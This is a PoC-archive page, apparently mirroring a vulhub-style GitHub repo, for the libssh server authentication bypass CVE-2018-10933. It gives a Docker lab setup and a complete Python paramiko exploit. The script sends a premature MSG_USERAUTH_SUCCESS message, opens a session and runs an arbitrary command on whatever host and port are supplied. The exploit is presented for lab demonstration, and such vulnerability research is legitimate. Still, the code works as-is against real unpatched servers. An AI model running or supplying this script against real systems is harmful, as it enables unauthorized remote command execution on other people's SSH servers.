POC详情: 59074a02468c380127ed0b04861dc6b63c0e342d

来源
https://github.com/cyberharsh/Libssh-server-CVE-2018-10933
关联漏洞
标题: libssh server-side state machine 安全漏洞 (CVE-2018-10933)
描述:libssh是一个用于访问SSH服务的C语言开发包,它能够执行远程命令、文件传输,同时为远程的程序提供安全的传输通道。server-side state machine是其中的一个服务器端状态机。 libssh的server-side state machine 0.7.6之前版本和0.8.4之前版本中存在安全漏洞。攻击者可借助恶意的客户端利用该漏洞在不进行身份验证的情况下创建通道,进而获取未授权的访问权限。
介绍
# libssh Authentication Bypass Vulnerability(CVE-2018-10933)

[中文版本(Chinese version)](README.zh-cn.md)

libssh is a multiplatform C library implementing the SSHv2 protocol on client and server side. A logic vulnerability was found in libssh's server-side state machine. The attacker can send the `MSG_USERAUTH_SUCCESS` message before the authentication succeed. That can bypass the authentication and access the target SSH server.


Refer:

- https://www.libssh.org/security/advisories/CVE-2018-10933.txt
- https://www.seebug.org/vuldb/ssvid-97614

----------

## Setup

Start the environment:

```
docker-compose up -d
```

After the environment is started, we can connect the `your-ip:2222` port (account password: `myuser:mypassword`), which is a legal ssh login:

![](1.png)

## Exploit

Referring to the POC given in https://www.seebug.org/vuldb/ssvid-97614, we can use the following script to proof the vulnerability.

```python
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

```

You can execute arbitrary commands on the target server like following:

![](2.png)
文件快照
 [4.0K]  /data/pocs/59074a02468c380127ed0b04861dc6b63c0e342d
├── [ 98K]  1.png
├── [333K]  2.png
├── [  85]  docker-compose.yml
├── [  51]  Dockerfile
├── [  21]  flagA
├── [2.2K]  README.md
└── [2.1K]  README.zh-cn.md

0 directories, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。